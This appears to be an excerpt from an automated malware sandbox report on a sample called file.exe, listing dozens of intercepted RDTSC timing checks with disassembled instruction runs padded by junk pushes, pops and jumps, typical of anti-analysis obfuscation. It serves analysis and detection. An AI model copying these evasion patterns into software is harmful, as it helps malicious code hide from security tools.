              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A367D second address: 13A3686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3686 second address: 13A368A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A368A second address: 13A368E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3AA6 second address: 13A3AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4031 second address: 13A4073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC1h 0x00000007 jmp 00007FEA188F2DBAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FEA188F2DD0h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4073 second address: 13A407B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A407B second address: 13A407F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A407F second address: 13A4083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AAB87 second address: 13AAB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AAB8C second address: 13AAB9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FEA188A9BDBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AAB9C second address: 13AABD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FEA188F2DC9h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FEA188F2DC8h 0x00000012 jo 00007FEA188F2DC2h 0x00000018 jns 00007FEA188F2DB6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F00D second address: 131F034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007FEA188A9BD6h 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 jmp 00007FEA188A9BDDh 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F034 second address: 131F046 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA188F2DBAh 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9443 second address: 13A9447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9447 second address: 13A9474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007FEA188F2DC8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA188F2DBBh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A972A second address: 13A9737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007FEA188A9BD6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9737 second address: 13A976F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FEA188F2DCDh 0x0000000b jmp 00007FEA188F2DC7h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEA188F2DBFh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A976F second address: 13A9776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9776 second address: 13A9791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DBFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FEA188F2DB6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A98D0 second address: 13A98DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A98DC second address: 13A98E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A98E0 second address: 13A98F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEA188A9BDCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A98F8 second address: 13A98FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9A71 second address: 13A9A7B instructions: 0x00000000 rdtsc 0x00000002 je 00007FEA188A9BDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9C04 second address: 13A9C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9C0A second address: 13A9C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FEA188A9BE2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9C19 second address: 13A9C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEA188F2DB6h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9C2A second address: 13A9C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9DA2 second address: 13A9DA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9DA6 second address: 13A9DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9DAC second address: 13A9DDE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007FEA188F2DC2h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jng 00007FEA188F2DB6h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9DDE second address: 13A9DEA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA188A9BD6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9F39 second address: 13A9F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DBAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9F47 second address: 13A9F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9F4B second address: 13A9F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9F51 second address: 13A9F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA50A second address: 13AA521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEA188F2DB6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jmp 00007FEA188F2DBAh 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA521 second address: 13AA53E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE7h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA53E second address: 13AA576 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEA188F2DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FEA188F2DBEh 0x00000012 jmp 00007FEA188F2DC3h 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007FEA188F2DB6h 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA576 second address: 13AA596 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE2h 0x00000007 jo 00007FEA188A9BD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA9C8 second address: 13AA9E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188F2DC4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA9E1 second address: 13AA9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188A9BDDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA9FA second address: 13AAA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DBAh 0x00000009 pop ecx 0x0000000a jmp 00007FEA188F2DBFh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AD240 second address: 13AD246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ACF4F second address: 13ACF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007FEA188F2DB6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push ecx 0x00000011 push esi 0x00000012 jmp 00007FEA188F2DC9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ACF7C second address: 13ACF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFF90 second address: 13AFF98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFF98 second address: 13AFF9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5422 second address: 13B542F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B542F second address: 13B5459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE4h 0x00000007 jmp 00007FEA188A9BE2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5459 second address: 13B545E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B545E second address: 13B5464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5605 second address: 13B561D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEA188F2DC1h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B575C second address: 13B5760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5760 second address: 13B5766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5766 second address: 13B5771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B59D2 second address: 13B59EB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEA188F2DB6h 0x00000008 jmp 00007FEA188F2DBAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B59EB second address: 13B59FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jno 00007FEA188A9BD6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B59FC second address: 13B5A1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEA188F2DC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5A1C second address: 13B5A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A1F second address: 13B8A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A28 second address: 13B8A5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEA188A9BE4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FEA188A9BE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A5B second address: 13B8A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jnp 00007FEA188F2DE8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA188F2DBFh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A7A second address: 13B8A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8BAC second address: 13B8BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC2h 0x00000009 pop esi 0x0000000a jmp 00007FEA188F2DC5h 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jo 00007FEA188F2DB6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8BE8 second address: 13B8BF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8BF4 second address: 13B8BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8BF8 second address: 13B8C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FEA188A9BE5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BEE08 second address: 13BEE67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DBCh 0x00000007 jmp 00007FEA188F2DC5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 je 00007FEA188F2DB6h 0x00000016 jng 00007FEA188F2DB6h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f push ebx 0x00000020 ja 00007FEA188F2DB6h 0x00000026 jmp 00007FEA188F2DC3h 0x0000002b pop ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e ja 00007FEA188F2DB6h 0x00000034 jc 00007FEA188F2DB6h 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD7E9 second address: 13BD816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007FEA188A9BD6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop eax 0x00000011 push edi 0x00000012 jmp 00007FEA188A9BE3h 0x00000017 je 00007FEA188A9BDCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD96C second address: 13BD970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD970 second address: 13BD974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD974 second address: 13BD97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDDBB second address: 13BDDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDDC1 second address: 13BDDCB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA188F2DC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDDCB second address: 13BDDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F4DA second address: 135F4E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F4E0 second address: 135F597 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA188A9BD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c jno 00007FEA188A9BD8h 0x00000012 popad 0x00000013 mov ebx, dword ptr [ebp+124825D9h] 0x00000019 mov dh, 1Ch 0x0000001b jmp 00007FEA188A9BDDh 0x00000020 add eax, ebx 0x00000022 call 00007FEA188A9BE2h 0x00000027 mov edi, dword ptr [ebp+122D2B40h] 0x0000002d pop edx 0x0000002e push eax 0x0000002f pushad 0x00000030 jmp 00007FEA188A9BE0h 0x00000035 jp 00007FEA188A9BD8h 0x0000003b popad 0x0000003c mov dword ptr [esp], eax 0x0000003f mov edx, 4E2F9D5Fh 0x00000044 push 00000004h 0x00000046 push 00000000h 0x00000048 push edi 0x00000049 call 00007FEA188A9BD8h 0x0000004e pop edi 0x0000004f mov dword ptr [esp+04h], edi 0x00000053 add dword ptr [esp+04h], 00000019h 0x0000005b inc edi 0x0000005c push edi 0x0000005d ret 0x0000005e pop edi 0x0000005f ret 0x00000060 jmp 00007FEA188A9BE1h 0x00000065 push eax 0x00000066 jo 00007FEA188A9BF8h 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007FEA188A9BE0h 0x00000073 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BE033 second address: 13BE039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C566F second address: 13C567F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188A9BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C567F second address: 13C5684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5684 second address: 13C5697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FEA188A9BD6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5697 second address: 13C569B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C57BD second address: 13C57C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C57C1 second address: 13C57DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5EC7 second address: 13C5ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5ECF second address: 13C5EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DBAh 0x00000009 jmp 00007FEA188F2DC1h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FEA188F2DB6h 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C676E second address: 13C6776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6776 second address: 13C6791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC6h 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6A4D second address: 13C6A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FEA188A9BE9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
